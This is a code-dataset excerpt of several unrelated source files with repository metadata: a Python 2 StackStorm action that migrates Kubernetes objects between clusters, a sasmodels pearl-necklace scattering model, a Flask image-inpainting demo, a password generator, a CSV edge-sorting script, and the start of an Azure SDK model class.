if "rollingUpdate" in item['spec']['strategy']:
if 'maxSurge' in item['spec']['strategy']['rollingUpdate']:
del item['spec']['strategy']['rollingUpdate']['maxSurge']
if 'maxUnavailable' in item['spec']['strategy']['rollingUpdate']:
del item['spec']['strategy']['rollingUpdate']['maxUnavailable']
output.append(item)
else:
output.append(data)
return output
def _lookup_func(self, func, functype):
"""
Given a k8s object, and an operation type, return the library function
This will break if the library changes..
:param str func: object type
:param str functype: choice between list (read) or create
:return: function name
"""
funcmap = {"ns": {"list": "read_namespace",
"create": "create_namespace"},
"service": {"list": "list_namespaced_service",
"create": "create_namespaced_service"},
"pod": {"list": "list_namespaced_pod",
"create": "create_namespaced_pod"},
"rc": {"list": "list_namespaced_replication_controller",
"create": "create_namespaced_replication_controller"},
"secret": {"list": "list_namespaced_secret",
"delete": "delete_namespaced_secret",
"create": "create_namespaced_secret"},
"ingress": {"list": "list_namespaced_ingress_0",
"create": "create_namespaced_ingress"},
"thirdparty": {"list": "list_third_party_resource",
"create": "create_namespaced_third_party_resource"},
"ds": {"list": "list_namespaced_daemon_set_0",
"create": "create_namespaced_daemon_set"},
"deployments": {"list": "list_namespaced_deployment_0",
"create": "create_namespaced_deployment"},
"rs": {"list": "list_namespaced_replica_set",
"create": "create_namespaced_replica_set"},
"endpoint": {"list": "list_namespaced_endpoints_20",
"create": "create_namespaced_endpoints"},
"pv": {"list": "list_persistent_volume",
"create": "create_persistent_volume"},
"pvclaim": {"list": "list_namespaced_persistent_volume_claim",
"create": "create_namespaced_persistent_volume_claim"},
"jobs": {"list": "list_namespaced_job_5",
"create": "create_namespaced_job"},
"hpa": {"list": "list_namespaced_horizontal_pod_autoscaler_3",
"create": "create_namespaced_horizontal_pod_autoscaler"},
"networkpol": {"list": "list_namespaced_network_policy",
"create": "create_namespaced_network_policy"},
"configmap": {"list": "list_namespaced_config_map_19",
"create": "create_namespaced_config_map"},
"limitrange": {"list": "list_namespaced_limit_range_0",
"create": "create_namespaced_limit_range"},
"podtemplate": {"list": "list_namespaced_pod_template",
"create": "create_namespaced_pod_template"},
"resquota": {"list": "list_namespaced_resource_quota",
"create": "create_namespaced_resource_quota"}
}
return funcmap[func][functype]
def post_data(self, datatype, body, **kwargs):
"""
Takes a datatype and structure, and posts it to the kubernetes cluster
:param str datatype: type of k8s object
:param str body: json structure
:param str ns: namespace to insert data to (optional)
:return: list of dicts with results for each input
"""
if datatype == 'secret':
mydeletefunc = self._lookup_func(datatype, "delete")
myfunc = self._lookup_func(datatype, "create")
# lookup which api the function lives in and set that to be the api
# endpoint to use
if(myfunc in dir(self.k8s_dst[0])):
myapi = self.k8s_dst[0]
if(myfunc in dir(self.k8s_dst[1])):
myapi = self.k8s_dst[1]
if "ns" in kwargs:
print "Posting Datatype {0} to namespace:{1}".format(datatype,kwargs['ns'])
else:
print "Posting Datatype {0}".format(datatype)
#print "body: "
#print json.dumps(body, sort_keys=True, indent=2, default=json_serial)
#print type(body)
output = []
for item in body:
#print "++++++++++++++"
#print json.dumps(item, sort_keys=True, indent=2, default=json_serial)
#print "++++++++++++++"
# if a namespace is set, make the function call with it. return a
# dict
if "ns" in kwargs:
myns = kwargs['ns']
if datatype == 'secret':
try:
getattr(myapi, mydeletefunc)(item, kwargs['ns'], item['metadata']['name']).to_dict()
except Exception:
continue
data = getattr(myapi, myfunc)(item, kwargs['ns']).to_dict()
if datatype == 'ns':
time.sleep(2)
else:
data = getattr(myapi, myfunc)(item).to_dict()
output.append(data)
return output
def _get_k8s_client(self, api_version, api_library, url, password):
api_version = importlib.import_module(api_version)
api_library = getattr(api_version, api_library)
api_version.Configuration().verify_ssl = False
api_version.Configuration().username = 'admin'
api_version.Configuration().password = password
host = url
apiclient = api_version.ApiClient(
host,
header_name="Authorization",
header_value=api_version.configuration.get_basic_auth_token())
apiclient.default_headers['Content-Type'] = 'application/json'
client = api_library(apiclient)
return client
| 46.253264
| 170
| 0.508439
|
import json
import importlib
from datetime import datetime
import time
from st2actions.runners.pythonrunner import Action
def json_serial(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, datetime):
serial = obj.isoformat()
return serial
raise TypeError("Type not serializable")
class K8sMigrateAction(Action):
def run(
self,
ns_migration,
src_k8s_url,
src_k8s_password,
dst_k8s_url,
dst_k8s_password):
self.k8s_src = (
self._get_k8s_client(
'k8sv1',
'ApivApi',
src_k8s_url,
src_k8s_password),
self._get_k8s_client(
'k8sv1beta1',
'ApisextensionsvbetaApi',
src_k8s_url,
src_k8s_password))
self.k8s_dst = (
self._get_k8s_client(
'k8sv1',
'ApivApi',
dst_k8s_url,
dst_k8s_password),
self._get_k8s_client(
'k8sv1beta1',
'ApisextensionsvbetaApi',
dst_k8s_url,
dst_k8s_password))
def get_post_compare(datatype, name, **kwargs):
srcdata = self.get_data(self.k8s_src, datatype, ns=name)
try:
res = post(srcdata, datatype, ns=name)
except Exception as e:
print "Excepetion occurred when posting datatype '{0}' for namespace '{1}' to the destination K8S API. Reason: {2}".format(datatype,name,e.reason)
dstdata = self.get_data(self.k8s_dst, datatype, ns=name)
if srcdata and not dstdata:
print ("--------- Entering Retry Logic ----------------")
print "Re-querying desitination for datatype: '{0}'".format(datatype)
time.sleep(5)
dstdata = self.get_data(self.k8s_dst, datatype, ns=name)
if srcdata and not dstdata:
print "Retrying post to destination for datatype: '{0}'".format(datatype)
try:
res = post(srcdata, datatype, ns=name)
except Exception as e:
print "Excepetion occurred when posting datatype '{0}' for namespace '{1}' to the destination K8S API. Reason: {2}".format(datatype,name,e.reason)
time.sleep(10)
dstdata = self.get_data(self.k8s_dst, datatype, ns=name)
if srcdata and not dstdata:
print "Datatype '{0}' for namespace '{1}' exists on src but was not successfully migrated to destination".format(datatype,name)
raise Exception("Source Data was not created on Destination ")
def post(data, datatype, **kwargs):
"""
Copy data from one cluster to another
:param object data: json object of data to be posted
:param str datatype: the type of k8s object (required)
:param str ns: k8s namespace (optional)
"""
if datatype == "ns":
kwargs = {}
if datatype == "thirdparty":
print json.dumps(data, sort_keys=True, indent=2, default=json_serial)
for tpr in data:
print "++++"
print json.dumps(tpr, sort_keys=True, indent=2, default=json_serial)
print "++++"
if 'namespace' in tpr['metadata']:
kwargs['ns'] = tpr['metadata']['namespace']
if kwargs['ns'] in ['default', 'kube-system']:
print "not migrating 3pr system ns"
return
res = self.post_data(datatype, tpr, **kwargs)
else:
print "no namespace for %s - skipping" % tpr['metadata']['name']
else:
res = self.post_data(datatype, data, **kwargs)
return res
nsdata = self.k8s_src[0].list_namespace().to_dict()
if ns_migration == "kube-system":
print "Operating on Namespace: kube-system"
get_post_compare("secret", ns_migration)
else:
for ns in nsdata['items']:
name = ns['metadata']['name']
if name in ['default', 'test-runner', 'kube-system']:
continue
else:
print "Operating on Namespace: " + name
get_post_compare("ns", name)
get_post_compare("service", name)
get_post_compare("deployments", name)
get_post_compare("ds", name)
get_post_compare("rc", name)
get_post_compare("secret", name)
get_post_compare("ingress", name)
get_post_compare("limitrange", name)
get_post_compare("resquota", name)
def get_data(self, target, datatype, **kwargs):
"""
Given a datatype and optional namespace, requests data from a kubernetes cluster
:param str datatype: type of k8s object
:param str ns: namespace to insert data to (optional)
:return: list of dicts with k8s data structures
"""
myfunc = self._lookup_func(datatype, "list")
if(myfunc in dir(target[0])):
myapi = target[0]
if(myfunc in dir(target[1])):
myapi = target[1]
if datatype == "thirdparty":
kwargs = {}
if "ns" in kwargs:
data = getattr(myapi, myfunc)(kwargs['ns']).to_dict()
else:
data = getattr(myapi, myfunc)().to_dict()
output = []
if "items" not in data:
tmp = {}
tmp['items'] = []
tmp['items'].append(data)
data = tmp
if "items" in data:
for item in data['items']:
if "type" in item:
if item['type'] == "kubernetes.io/service-account-token":
continue
if "status" in item:
del item['status']
if "metadata" in item:
if "uid" in item['metadata']:
del item['metadata']['uid']
if "selfLink" in item['metadata']:
del item['metadata']['selfLink']
if "resourceVersion" in item['metadata']:
del item['metadata']['resourceVersion']
if "creationTimestamp" in item['metadata']:
del item['metadata']['creationTimestamp']
if "generation" in item['metadata']:
del item['metadata']['generation']
if "deletionGracePeriodSeconds" in item['metadata']:
del item['metadata']['deletionGracePeriodSeconds']
if "deletionTimestamp" in item['metadata']:
del item['metadata']['deletionTimestamp']
if "annotations" in item['metadata']:
del item['metadata']['annotations']
if "generateName" in item['metadata']:
del item['metadata']['generateName']
if "namespace" in item['metadata']:
del item['metadata']['namespace']
if "ownerReferences" in item['metadata']:
del item['metadata']['ownerReferences']
if "finalizers" in item['metadata']:
del item['metadata']['finalizers']
# if "labels" in item['metadata']:
# del item['metadata']['labels']
if "spec" in item:
if "finalizers" in item['spec']:
del item['spec']['finalizers']
if "template" in item['spec']:
if "spec" in item['spec']['template']:
if "generation" in item[
'spec']['template']['spec']:
del item['spec']['template'][
'spec']['securityContext']
if "dnsPolicy" in item['spec']['template']['spec']:
del item['spec']['template'][
'spec']['dnsPolicy']
if "terminationGracePeriodSeconds" in item[
'spec']['template']['spec']:
del item['spec']['template']['spec'][
'terminationGracePeriodSeconds']
if "restartPolicy" in item[
'spec']['template']['spec']:
del item['spec']['template'][
'spec']['restartPolicy']
if "containers" in item['spec']['template']['spec']:
for cont in item['spec']['template']['spec']['containers']:
if cont['livenessProbe'] is not None:
if "_exec" in cont['livenessProbe']:
cont['livenessProbe']['exec'] = cont['livenessProbe'].pop('_exec')
if "clusterIP" in item['spec']:
del item['spec']['clusterIP']
if "strategy" in item['spec']:
if "rollingUpdate" in item['spec']['strategy']:
if 'maxSurge' in item['spec']['strategy']['rollingUpdate']:
del item['spec']['strategy']['rollingUpdate']['maxSurge']
if 'maxUnavailable' in item['spec']['strategy']['rollingUpdate']:
del item['spec']['strategy']['rollingUpdate']['maxUnavailable']
output.append(item)
else:
output.append(data)
return output
def _lookup_func(self, func, functype):
"""
Given a k8s object, and an operation type, return the library function
This will break if the library changes..
:param str func: object type
:param str functype: choice between list (read) or create
:return: function name
"""
funcmap = {"ns": {"list": "read_namespace",
"create": "create_namespace"},
"service": {"list": "list_namespaced_service",
"create": "create_namespaced_service"},
"pod": {"list": "list_namespaced_pod",
"create": "create_namespaced_pod"},
"rc": {"list": "list_namespaced_replication_controller",
"create": "create_namespaced_replication_controller"},
"secret": {"list": "list_namespaced_secret",
"delete": "delete_namespaced_secret",
"create": "create_namespaced_secret"},
"ingress": {"list": "list_namespaced_ingress_0",
"create": "create_namespaced_ingress"},
"thirdparty": {"list": "list_third_party_resource",
"create": "create_namespaced_third_party_resource"},
"ds": {"list": "list_namespaced_daemon_set_0",
"create": "create_namespaced_daemon_set"},
"deployments": {"list": "list_namespaced_deployment_0",
"create": "create_namespaced_deployment"},
"rs": {"list": "list_namespaced_replica_set",
"create": "create_namespaced_replica_set"},
"endpoint": {"list": "list_namespaced_endpoints_20",
"create": "create_namespaced_endpoints"},
"pv": {"list": "list_persistent_volume",
"create": "create_persistent_volume"},
"pvclaim": {"list": "list_namespaced_persistent_volume_claim",
"create": "create_namespaced_persistent_volume_claim"},
"jobs": {"list": "list_namespaced_job_5",
"create": "create_namespaced_job"},
"hpa": {"list": "list_namespaced_horizontal_pod_autoscaler_3",
"create": "create_namespaced_horizontal_pod_autoscaler"},
"networkpol": {"list": "list_namespaced_network_policy",
"create": "create_namespaced_network_policy"},
"configmap": {"list": "list_namespaced_config_map_19",
"create": "create_namespaced_config_map"},
"limitrange": {"list": "list_namespaced_limit_range_0",
"create": "create_namespaced_limit_range"},
"podtemplate": {"list": "list_namespaced_pod_template",
"create": "create_namespaced_pod_template"},
"resquota": {"list": "list_namespaced_resource_quota",
"create": "create_namespaced_resource_quota"}
}
return funcmap[func][functype]
def post_data(self, datatype, body, **kwargs):
"""
Takes a datatype and structure, and posts it to the kubernetes cluster
:param str datatype: type of k8s object
:param str body: json structure
:param str ns: namespace to insert data to (optional)
:return: list of dicts with results for each input
"""
if datatype == 'secret':
mydeletefunc = self._lookup_func(datatype, "delete")
myfunc = self._lookup_func(datatype, "create")
# lookup which api the function lives in and set that to be the api
# endpoint to use
if(myfunc in dir(self.k8s_dst[0])):
myapi = self.k8s_dst[0]
if(myfunc in dir(self.k8s_dst[1])):
myapi = self.k8s_dst[1]
if "ns" in kwargs:
print "Posting Datatype {0} to namespace:{1}".format(datatype,kwargs['ns'])
else:
print "Posting Datatype {0}".format(datatype)
#print "body: "
#print json.dumps(body, sort_keys=True, indent=2, default=json_serial)
#print type(body)
output = []
for item in body:
#print "++++++++++++++"
#print json.dumps(item, sort_keys=True, indent=2, default=json_serial)
#print "++++++++++++++"
# if a namespace is set, make the function call with it. return a
# dict
if "ns" in kwargs:
myns = kwargs['ns']
if datatype == 'secret':
try:
getattr(myapi, mydeletefunc)(item, kwargs['ns'], item['metadata']['name']).to_dict()
except Exception:
continue
data = getattr(myapi, myfunc)(item, kwargs['ns']).to_dict()
if datatype == 'ns':
time.sleep(2)
else:
data = getattr(myapi, myfunc)(item).to_dict()
output.append(data)
return output
def _get_k8s_client(self, api_version, api_library, url, password):
api_version = importlib.import_module(api_version)
api_library = getattr(api_version, api_library)
api_version.Configuration().verify_ssl = False
api_version.Configuration().username = 'admin'
api_version.Configuration().password = password
host = url
apiclient = api_version.ApiClient(
host,
header_name="Authorization",
header_value=api_version.configuration.get_basic_auth_token())
apiclient.default_headers['Content-Type'] = 'application/json'
client = api_library(apiclient)
return client
| false
| true
|
f719124569af67768775e9d2f1c0b713b0b7a884
| 4,855
|
py
|
Python
|
sasmodels/models/pearl_necklace.py
|
jmborr/sasmodels
|
bedb9b0fed4f3f4bc2bbfa5878de6f2b6fdfbcc9
|
[
"BSD-3-Clause"
] | null | null | null |
sasmodels/models/pearl_necklace.py
|
jmborr/sasmodels
|
bedb9b0fed4f3f4bc2bbfa5878de6f2b6fdfbcc9
|
[
"BSD-3-Clause"
] | null | null | null |
sasmodels/models/pearl_necklace.py
|
jmborr/sasmodels
|
bedb9b0fed4f3f4bc2bbfa5878de6f2b6fdfbcc9
|
[
"BSD-3-Clause"
] | 1
|
2021-04-28T14:21:17.000Z
|
2021-04-28T14:21:17.000Z
|
r"""
This model provides the form factor for a pearl necklace composed of two
elements: *N* pearls (homogeneous spheres of radius *R*) freely jointed by *M*
rods (like strings - with a total mass *Mw* = *M* \* *m*\ :sub:`r` + *N* \* *m*\
:sub:`s`, and the string segment length (or edge separation) *l*
(= *A* - 2\ *R*)). *A* is the center-to-center pearl separation distance.
.. figure:: img/pearl_necklace_geometry.jpg
Pearl Necklace schematic
Definition
----------
The output of the scattering intensity function for the pearl_necklace is
given by (Schweins, 2004)
.. math::
I(q)=\frac{ \text{scale} }{V} \cdot \frac{(S_{ss}(q)+S_{ff}(q)+S_{fs}(q))}
{(M \cdot m_f + N \cdot m_s)^2} + \text{bkg}
where
.. math::
S_{ss}(q) &= sm_s^2\psi^2(q)[\frac{N}{1-sin(qA)/qA}-\frac{N}{2}-
\frac{1-(sin(qA)/qA)^N}{(1-sin(qA)/qA)^2}\cdot\frac{sin(qA)}{qA}] \\
S_{ff}(q) &= sm_r^2[M\{2\Lambda(q)-(\frac{sin(ql/2)}{ql/2})\}+
\frac{2M\beta^2(q)}{1-sin(qA)/qA}-2\beta^2(q)\cdot
\frac{1-(sin(qA)/qA)^M}{(1-sin(qA)/qA)^2}] \\
S_{fs}(q) &= m_r \beta (q) \cdot m_s \psi (q) \cdot 4[
\frac{N-1}{1-sin(qA)/qA}-\frac{1-(sin(qA)/qA)^{N-1}}{(1-sin(qA)/qA)^2}
\cdot \frac{sin(qA)}{qA}] \\
\psi(q) &= 3 \cdot \frac{sin(qR)-(qR)\cdot cos(qR)}{(qR)^3} \\
\Lambda(q) &= \frac{\int_0^{ql}\frac{sin(t)}{t}dt}{ql} \\
\beta(q) &= \frac{\int_{qR}^{q(A-R)}\frac{sin(t)}{t}dt}{ql}
where the mass *m*\ :sub:`i` is (SLD\ :sub:`i` - SLD\ :sub:`solvent`) \*
(volume of the *N* pearls/rods). *V* is the total volume of the necklace.
The 2D scattering intensity is the same as $P(q)$ above, regardless of the
orientation of the *q* vector.
The returned value is scaled to units of |cm^-1| and the parameters of the
pearl_necklace model are the following
NB: *num_pearls* must be an integer.
References
----------
R Schweins and K Huber, *Particle Scattering Factor of Pearl Necklace Chains*,
*Macromol. Symp.* 211 (2004) 25-42 2004
"""
from numpy import inf, pi
name = "pearl_necklace"
title = "Colloidal spheres chained together with no preferential orientation"
description = """
Calculate form factor for Pearl Necklace Model
[Macromol. Symp. 2004, 211, 25-42]
Parameters:
background:background
scale: scale factor
sld: the SLD of the pearl spheres
sld_string: the SLD of the strings
sld_solvent: the SLD of the solvent
num_pearls: number of the pearls
radius: the radius of a pearl
edge_sep: the length of string segment; surface to surface
thick_string: thickness (ie, diameter) of the string
"""
category = "shape:cylinder"
# ["name", "units", default, [lower, upper], "type","description"],
parameters = [["radius", "Ang", 80.0, [0, inf], "volume",
"Mean radius of the chained spheres"],
["edge_sep", "Ang", 350.0, [0, inf], "volume",
"Mean separation of chained particles"],
["thick_string", "Ang", 2.5, [0, inf], "volume",
"Thickness of the chain linkage"],
["num_pearls", "none", 3, [1, inf], "volume",
"Number of pearls in the necklace (must be integer)"],
["sld", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chained spheres"],
["sld_string", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chain linkage"],
["sld_solvent", "1e-6/Ang^2", 6.3, [-inf, inf], "sld",
"Scattering length density of the solvent"],
]
source = ["lib/sas_Si.c", "lib/sas_3j1x_x.c", "pearl_necklace.c"]
single = False # use double precision unless told otherwise
def volume(radius, edge_sep, thick_string, num_pearls):
"""
Calculates the total particle volume of the necklace.
Redundant with form_volume.
"""
num_pearls = int(num_pearls + 0.5)
number_of_strings = num_pearls - 1.0
string_vol = edge_sep * pi * pow((thick_string / 2.0), 2.0)
pearl_vol = 4.0 /3.0 * pi * pow(radius, 3.0)
total_vol = number_of_strings * string_vol
total_vol += num_pearls * pearl_vol
return total_vol
def ER(radius, edge_sep, thick_string, num_pearls):
"""
Calculation for effective radius.
"""
num_pearls = int(num_pearls + 0.5)
tot_vol = volume(radius, edge_sep, thick_string, num_pearls)
rad_out = (tot_vol/(4.0/3.0*pi)) ** (1./3.)
return rad_out
# parameters for demo
demo = dict(scale=1, background=0, radius=80.0, edge_sep=350.0,
num_pearls=3, sld=1, sld_solvent=6.3, sld_string=1,
thick_string=2.5,
radius_pd=.2, radius_pd_n=5,
edge_sep_pd=25.0, edge_sep_pd_n=5,
num_pearls_pd=0, num_pearls_pd_n=0,
thick_string_pd=0.2, thick_string_pd_n=5,
)
tests = [[{}, 0.001, 17380.245], [{}, 'ER', 115.39502]]
| 37.346154
| 80
| 0.612976
|
from numpy import inf, pi
name = "pearl_necklace"
title = "Colloidal spheres chained together with no preferential orientation"
description = """
Calculate form factor for Pearl Necklace Model
[Macromol. Symp. 2004, 211, 25-42]
Parameters:
background:background
scale: scale factor
sld: the SLD of the pearl spheres
sld_string: the SLD of the strings
sld_solvent: the SLD of the solvent
num_pearls: number of the pearls
radius: the radius of a pearl
edge_sep: the length of string segment; surface to surface
thick_string: thickness (ie, diameter) of the string
"""
category = "shape:cylinder"
parameters = [["radius", "Ang", 80.0, [0, inf], "volume",
"Mean radius of the chained spheres"],
["edge_sep", "Ang", 350.0, [0, inf], "volume",
"Mean separation of chained particles"],
["thick_string", "Ang", 2.5, [0, inf], "volume",
"Thickness of the chain linkage"],
["num_pearls", "none", 3, [1, inf], "volume",
"Number of pearls in the necklace (must be integer)"],
["sld", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chained spheres"],
["sld_string", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chain linkage"],
["sld_solvent", "1e-6/Ang^2", 6.3, [-inf, inf], "sld",
"Scattering length density of the solvent"],
]
source = ["lib/sas_Si.c", "lib/sas_3j1x_x.c", "pearl_necklace.c"]
single = False
def volume(radius, edge_sep, thick_string, num_pearls):
num_pearls = int(num_pearls + 0.5)
number_of_strings = num_pearls - 1.0
string_vol = edge_sep * pi * pow((thick_string / 2.0), 2.0)
pearl_vol = 4.0 /3.0 * pi * pow(radius, 3.0)
total_vol = number_of_strings * string_vol
total_vol += num_pearls * pearl_vol
return total_vol
def ER(radius, edge_sep, thick_string, num_pearls):
num_pearls = int(num_pearls + 0.5)
tot_vol = volume(radius, edge_sep, thick_string, num_pearls)
rad_out = (tot_vol/(4.0/3.0*pi)) ** (1./3.)
return rad_out
demo = dict(scale=1, background=0, radius=80.0, edge_sep=350.0,
num_pearls=3, sld=1, sld_solvent=6.3, sld_string=1,
thick_string=2.5,
radius_pd=.2, radius_pd_n=5,
edge_sep_pd=25.0, edge_sep_pd_n=5,
num_pearls_pd=0, num_pearls_pd_n=0,
thick_string_pd=0.2, thick_string_pd_n=5,
)
tests = [[{}, 0.001, 17380.245], [{}, 'ER', 115.39502]]
| true
| true
|
f719129263fd17bc4e3b23fe0f051e771ce36bbd
| 1,835
|
py
|
Python
|
demo_site/routes.py
|
ArtemiiH/ppl_eraser_demo_site
|
42555a3c74abc434c1ad7ff62cddc822d0a35ce8
|
[
"MIT"
] | null | null | null |
demo_site/routes.py
|
ArtemiiH/ppl_eraser_demo_site
|
42555a3c74abc434c1ad7ff62cddc822d0a35ce8
|
[
"MIT"
] | null | null | null |
demo_site/routes.py
|
ArtemiiH/ppl_eraser_demo_site
|
42555a3c74abc434c1ad7ff62cddc822d0a35ce8
|
[
"MIT"
] | null | null | null |
import urllib
from io import BytesIO
import requests
from flask import (Blueprint, current_app, jsonify, make_response,
render_template, request)
from .helpers import prepare_image_for_json
bp = Blueprint('routes', __name__, url_prefix='')
@bp.route('/', methods=['GET'])
def home():
return render_template('home.html')
@bp.route('/inpaint', methods=['GET', 'POST'])
def inpaint():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/inpaint'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('inpaint.html')
@bp.route('/cut', methods=['GET', 'POST'])
def cut():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/cut'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('cut.html')
@bp.route('/mask', methods=['GET', 'POST'])
def mask():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/mask'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('mask.html')
| 33.363636
| 71
| 0.646866
|
import urllib
from io import BytesIO
import requests
from flask import (Blueprint, current_app, jsonify, make_response,
render_template, request)
from .helpers import prepare_image_for_json
bp = Blueprint('routes', __name__, url_prefix='')
@bp.route('/', methods=['GET'])
def home():
return render_template('home.html')
@bp.route('/inpaint', methods=['GET', 'POST'])
def inpaint():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/inpaint'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('inpaint.html')
@bp.route('/cut', methods=['GET', 'POST'])
def cut():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/cut'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('cut.html')
@bp.route('/mask', methods=['GET', 'POST'])
def mask():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/mask'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('mask.html')
| true
| true
|
f719132b31b09ec071c7f06ba0c074e2c1965b39
| 560
|
py
|
Python
|
password generator.py
|
JoseRoberto1506/Password-generator
|
47045b6a2de4dd609874dfce0077e9e30ac5cade
|
[
"MIT"
] | null | null | null |
password generator.py
|
JoseRoberto1506/Password-generator
|
47045b6a2de4dd609874dfce0077e9e30ac5cade
|
[
"MIT"
] | null | null | null |
password generator.py
|
JoseRoberto1506/Password-generator
|
47045b6a2de4dd609874dfce0077e9e30ac5cade
|
[
"MIT"
] | null | null | null |
from string import ascii_letters, digits
from secrets import choice
lenght = int(input("Você deseja uma senha de quantos caracteres? "))
special_characters = "!#$%&()*+,-./:;<=>?@[\]_{|}."
characters = ascii_letters + special_characters + digits
while True:
password = ''.join(choice(characters) for i in range (lenght))
if (any(c.islower() for c in password) and
any(c.isupper() for c in password) and
any(c.isdigit() for c in password) and
any(sc in special_characters for sc in password)):
break
print(password)
| 32.941176
| 68
| 0.666071
|
from string import ascii_letters, digits
from secrets import choice
lenght = int(input("Você deseja uma senha de quantos caracteres? "))
special_characters = "!#$%&()*+,-./:;<=>?@[\]_{|}."
characters = ascii_letters + special_characters + digits
while True:
password = ''.join(choice(characters) for i in range (lenght))
if (any(c.islower() for c in password) and
any(c.isupper() for c in password) and
any(c.isdigit() for c in password) and
any(sc in special_characters for sc in password)):
break
print(password)
| true
| true
|
f71913c1c96aa7dfd421ab759af0daac0e1f61ed
| 1,109
|
py
|
Python
|
mono2micro/ebc-application/ebc-data_dependencies/dynamic_dependencies/order_dependencies.py
|
jahn18/Normalized-TurboMQ
|
f44d85dca15d86a82e15b083072e05698135e479
|
[
"MIT"
] | null | null | null |
mono2micro/ebc-application/ebc-data_dependencies/dynamic_dependencies/order_dependencies.py
|
jahn18/Normalized-TurboMQ
|
f44d85dca15d86a82e15b083072e05698135e479
|
[
"MIT"
] | null | null | null |
mono2micro/ebc-application/ebc-data_dependencies/dynamic_dependencies/order_dependencies.py
|
jahn18/Normalized-TurboMQ
|
f44d85dca15d86a82e15b083072e05698135e479
|
[
"MIT"
] | null | null | null |
import csv
import sys
def orderEdges(fileName):
dynamic_dependencies_file = open(fileName)
csv_reader = csv.reader(dynamic_dependencies_file)
list_of_edges = []
for row in csv_reader:
list_of_edges.append(row[0].split())
sortedList = insertionSort(list_of_edges)
return sortedList
def writeCSV(sortedList, fileName):
with open(fileName, "w") as f:
writer = csv.writer(f)
writer.writerows(sortedList)
def insertionSort(list_of_values):
for i in range(len(list_of_values)):
j = findMin(i, list_of_values)
list_of_values[i], list_of_values[j] = list_of_values[j], list_of_values[i]
return list_of_values
def findMin(i, list_of_values):
smallest_value = int(list_of_values[i][2])
index = i
for j in range(i, len(list_of_values)):
if int(list_of_values[j][2]) < smallest_value:
index = j
smallest_value = int(list_of_values[j][2])
return index
if __name__ == "__main__":
fileName = sys.argv[1]
sortedList = orderEdges(fileName)
writeCSV(sortedList, 'sorted_edges.csv')
| 29.972973
| 83
| 0.680794
|
import csv
import sys
def orderEdges(fileName):
dynamic_dependencies_file = open(fileName)
csv_reader = csv.reader(dynamic_dependencies_file)
list_of_edges = []
for row in csv_reader:
list_of_edges.append(row[0].split())
sortedList = insertionSort(list_of_edges)
return sortedList
def writeCSV(sortedList, fileName):
with open(fileName, "w") as f:
writer = csv.writer(f)
writer.writerows(sortedList)
def insertionSort(list_of_values):
for i in range(len(list_of_values)):
j = findMin(i, list_of_values)
list_of_values[i], list_of_values[j] = list_of_values[j], list_of_values[i]
return list_of_values
def findMin(i, list_of_values):
smallest_value = int(list_of_values[i][2])
index = i
for j in range(i, len(list_of_values)):
if int(list_of_values[j][2]) < smallest_value:
index = j
smallest_value = int(list_of_values[j][2])
return index
if __name__ == "__main__":
fileName = sys.argv[1]
sortedList = orderEdges(fileName)
writeCSV(sortedList, 'sorted_edges.csv')
| true
| true
|
f719145474888494e028913c2c5ae60602cf70ac
| 1,826
|
py
|
Python
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_ssl_predefined_policy.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2022-03-30T22:39:15.000Z
|
2022-03-30T22:39:15.000Z
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_ssl_predefined_policy.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 54
|
2016-03-25T17:25:01.000Z
|
2018-10-22T17:27:54.000Z
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_ssl_predefined_policy.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 2
|
2017-01-20T18:25:46.000Z
|
2017-05-12T21:31:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewaySslPredefinedPolicy(SubResource):
"""An Ssl predefined policy.
:param id: Resource ID.
:type id: str
:param name: Name of Ssl predefined policy.
:type name: str
:param cipher_suites: Ssl cipher suites to be enabled in the specified
order for application gateway.
:type cipher_suites: list[str or
